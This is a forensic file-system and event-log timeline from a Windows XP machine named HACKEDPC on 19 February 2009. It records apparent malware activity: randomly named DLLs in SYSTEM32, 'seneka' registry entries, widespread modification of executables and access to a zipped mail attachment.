02/19/09 10:46:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:46:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:47:04 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:47:09 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:47:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:47:18 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
-02/19/09 10:47:23 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:47:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:47:32 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:49:57 modified googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive02/19/09 10:51:00 accessed googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive02/19/09 10:51:55 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. 
-02/19/09 10:53:36 accessed reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:53:41 modified wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive02/19/09 10:53:56 modified xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 10:54:02 modified Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive02/19/09 11:00:10 accessed RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 written RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 modified RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 accessed RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 written RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:00:10 modified RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 11:01:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:01:33 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. 
-02/19/09 11:01:37 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:01:50 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:01:53 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:01:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:04 modified reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive02/19/09 11:02:06 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:06 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:16 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. 
-02/19/09 11:02:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:31 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 11:02:36 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:45 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. 
-02/19/09 11:02:48 accessed conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive02/19/09 11:02:48 modified mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:48 modified unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 accessed unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 accessed wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:49 modified wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive02/19/09 11:02:51 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 11:02:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 11:02:58 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. 
-02/19/09 11:16:39 modified cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive02/19/09 11:16:45 modified ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive
02/19/09 11:18:06 accessed Ken.mbx C:\My Documents\Qualcomm\Eudora\Ken.mbx02/19/09 11:18:18 accessed Misc.mbx C:\My Documents\Qualcomm\Eudora\Misc.mbx02/19/09 11:18:18 accessed Out.mbx C:\My Documents\Qualcomm\Eudora\Out.mbx
02/19/09 11:19:28 accessed senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 accessed senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 modified senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 11:19:28 written senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive
02/19/09 11:21:54 accessed Mike.mbx C:\Eudora\Mike.mbx02/19/09 11:21:54 accessed Misc.mbx C:\Eudora\Misc.mbx02/19/09 11:22:19 accessed Out.mbx C:\Eudora\Out.mbx
02/19/09 11:22:21 accessed Previous search.mbx C:\Eudora\Previous search.mbx
02/19/09 11:22:21 accessed Scholarship.mbx C:\Eudora\Scholarship.mbx
02/19/09 11:24:00 accessed 37679041.pdf.zip C:\\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive
02/19/09 12:11:29 modified SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive
02/19/09 12:13:32 modified defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive
02/19/09 12:13:34 modified dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive
02/19/09 12:20:39 accessed Mike.mbx C:\My Documents\Eudora\Mike.mbx
02/19/09 12:20:50 accessed Misc.mbx C:\My Documents\Eudora\Misc.mbx
02/19/09 12:22:33 accessed Out.mbx C:\My Documents\Eudora\Out.mbx
02/19/09 12:23:07 accessed Previous search.mbx C:\My Documents\Eudora\Previous search.mbx
02/19/09 12:23:30 accessed Scholarship.mbx C:\My Documents\Eudora\Scholarship.mbx
02/19/09 12:25:26 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC0000001' while processing the file '' on the volume 'Disk0'. It has stopped monitoring the volume.
02/19/09 12:40:52 modified helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive
02/19/09 12:40:54 accessed helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive
02/19/09 12:41:21 accessed WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf
02/19/09 12:41:21 written WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf
02/19/09 12:41:21 modified WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf
02/19/09 12:41:22 modified ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive
02/19/09 12:41:34 accessed CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive
02/19/09 12:41:35 accessed cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive
02/19/09 12:41:37 accessed ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive
02/19/09 12:41:44 accessed dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive
02/19/09 12:41:48 accessed hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:13 accessed prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive
02/19/09 12:42:15 accessed reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 12:42:36 accessed 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive
02/19/09 12:42:36 accessed 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 12:42:36 accessed 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 12:42:36 accessed 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 12:42:36 accessed accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:37 accessed DRWATSON.EXE C:\\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive
02/19/09 12:42:37 accessed defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:37 accessed dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:37 accessed dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:38 accessed fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive
02/19/09 12:42:38 accessed fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:38 accessed geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:42:38 accessed igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:38 accessed imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:38 accessed ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:38 accessed jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:42:39 accessed MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive
02/19/09 12:42:39 accessed mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive
02/19/09 12:42:39 accessed mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:39 accessed mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:40 accessed netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:40 accessed ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:40 accessed ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:40 accessed pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:42:40 accessed rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:42:41 accessed ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:42:42 accessed userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive
02/19/09 12:42:42 accessed wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 12:51:33 accessed 37679041.pdf.zip C:\\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive
02/19/09 14:19:50 accessed xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive
02/19/09 14:24:38 accessed SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive
02/19/09 14:24:48 accessed SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf
02/19/09 14:24:48 written SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf
02/19/09 14:24:48 modified SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf
02/19/09 14:42:56 accessed info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network Graphic File, Archive, Not Indexed
02/19/09 14:42:56 created info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network Graphic File, Archive, Not Indexed
02/19/09 14:42:56 modified info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network Graphic File, Archive, Not Indexed
02/19/09 14:42:56 written info_48[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\info_48[1] * Portable Network Graphic File, Archive, Not Indexed
02/19/09 15:05:13 accessed rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive
02/19/09 15:05:15 accessed vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 15:05:23 accessed RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 created RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 written RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 modified RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 accessed RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 created RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 written RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:23 modified RUNDLL32.EXE-56884C6C.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-56884C6C.pf
02/19/09 15:05:42 created TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:05:42 created TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:05:53 accessed cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 15:05:53 accessed senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 15:05:57 accessed Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:05:58 accessed verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File
02/19/09 15:05:59 accessed VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf
02/19/09 15:05:59 written VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf
02/19/09 15:05:59 modified VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf
02/19/09 15:06:01 accessed SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:07 accessed uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System
02/19/09 15:06:26 accessed taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive
02/19/09 15:06:39 accessed explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:39 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SOFTWARE\NTRegistry\$$$PROTO.HIV\seneka Folder Folder, Registry Entry
02/19/09 15:06:40 modified taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive
02/19/09 15:06:42 modified Icon84031A18.exe C:\\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:06:42 modified NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe C:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe Windows Executable Code\Executable Match File, Read Only, Archive
02/19/09 15:06:42 modified Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe C:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive
02/19/09 15:06:42 modified Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe C:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive
02/19/09 15:06:42 modified Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe C:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:06:42 modified Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe C:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive
02/19/09 15:06:42 modified SSLang.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File
02/19/09 15:06:42 modified SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:42 modified Ssopen.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File
02/19/09 15:06:42 modified Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:42 modified accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:06:42 modified msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:42 modified mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:42 modified pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:06:42 modified setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File
02/19/09 15:06:42 modified uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive
02/19/09 15:06:42 modified wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive
02/19/09 15:06:42 modified wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive
02/19/09 15:06:43 modified explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive
02/19/09 15:08:04 accessed regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive
02/19/09 15:08:04 modified regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive
02/19/09 15:08:14 accessed REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 created REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 written REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 modified REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 accessed REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 created REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 written REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:08:14 modified REGEDIT.EXE-2AE3423E.pf C:\WINDOWS\Prefetch\REGEDIT.EXE-2AE3423E.pf
02/19/09 15:10:30 accessed taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive
02/19/09 15:10:30 modified taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive
02/19/09 15:10:40 created TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:10:40 created TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:11:34 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_failed.html History\Daily
02/19/09 15:13:30 accessed tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive
02/19/09 15:13:30 modified tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive
